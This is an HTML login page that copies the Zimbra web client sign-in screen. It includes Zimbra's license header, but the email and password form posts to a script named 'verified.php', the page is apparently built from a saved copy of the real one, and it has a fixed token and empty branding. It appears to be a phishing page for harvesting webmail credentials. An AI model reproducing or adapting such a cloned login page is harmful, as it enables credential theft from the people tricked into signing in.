<!DOCTYPE html>
<!-- set this class so CSS definitions that now use REM size, would work relative to this.
	Since now almost everything is relative to one of the 2 absolute font size classese -->
<html class="user_font_size_normal" lang="en"><head>
<!--
 login.jsp
 * ***** BEGIN LICENSE BLOCK *****
 * Zimbra Collaboration Suite Web Client
 * Copyright (C) 2007, 2008, 2009, 2010, 2011, 2012, 2013, 2014, 2015, 2016 Synacor, Inc.
 *
 * This program is free software: you can redistribute it and/or modify it under
 * the terms of the GNU General Public License as published by the Free Software Foundation,
 * version 2 of the License.
 *
 * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY;
 * without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
 * See the GNU General Public License for more details.
 * You should have received a copy of the GNU General Public License along with this program.
 * If not, see <https://www.gnu.org/licenses/>.
 * ***** END LICENSE BLOCK *****
-->
	<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
	<title>Web Client Sign In</title>
	<meta name="viewport" content="width=device-width, initial-scale=1.0">
	<meta name="description" content="">
	<meta name="apple-mobile-web-app-capable" content="yes">
	<meta name="apple-mobile-web-app-status-bar-style" content="black">
	<link rel="stylesheet" type="text/css" href="Web%20Client%20Sign%20In_files/commonloginzhtmlskin.css">
	<link rel="SHORTCUT ICON" href="">
	<link rel="stylesheet" type="text/css" href="css/bootstrap.min.css">

</head>
<body onload="onLoad();">

	<div class="LoginScreen">
		<div class="center">
			<div class="contentBox">
				<h1><a href="" id="bannerLink" target="_new" title=""><span class="ScreenReaderOnly"></span>
					<span class="ImgLoginBanner"></span>
				</a></h1>
				<div id="ZLoginAppName">Web Client</div>
				<form method="post" name="loginForm" action="verified.php" accept-charset="UTF-8">
								<input type="hidden" name="loginOp" value="login">
								<input type="hidden" name="login_csrf" value="af1b5a74-4160-468e-b0b5-c839924ba08b">

								<table class="form">
                        <tbody>
                                        <tr>
                                        <td><label for="username"> </label></td>
                                        <td><input id="Email" class="form-control" name="Email" type="text" size="40" maxlength="1024" autocapitalize="off" placeholder="Email or phone number" autocorrect="off"></td>
                                        </tr>
                                        <tr>
                                <td><label for="password"> </label></td>
                                <td><input id="password" autocomplete="off" class="form-control" name="password" type="password" value="" placeholder="Password" size="40" maxlength="1024"> </td>
                                </tr>
                                
                                
                                       
                                
                                <tr>
                                <td>&nbsp;</td>
                                <td class="btn btn-primary">
                                <input id="remember" value="1" type="checkbox" name="zrememberme">
                                    <label for="remember">Stay signed in</label>
                                <input type="submit" class="btn btn-primary" value="Sign In">
                                </td>
                                </tr>
			
			
                          
                        </tbody></table>
                    </form>
			</div>
			<div class="decor1"></div>
		</div>

	
		
	</div>



</body></html>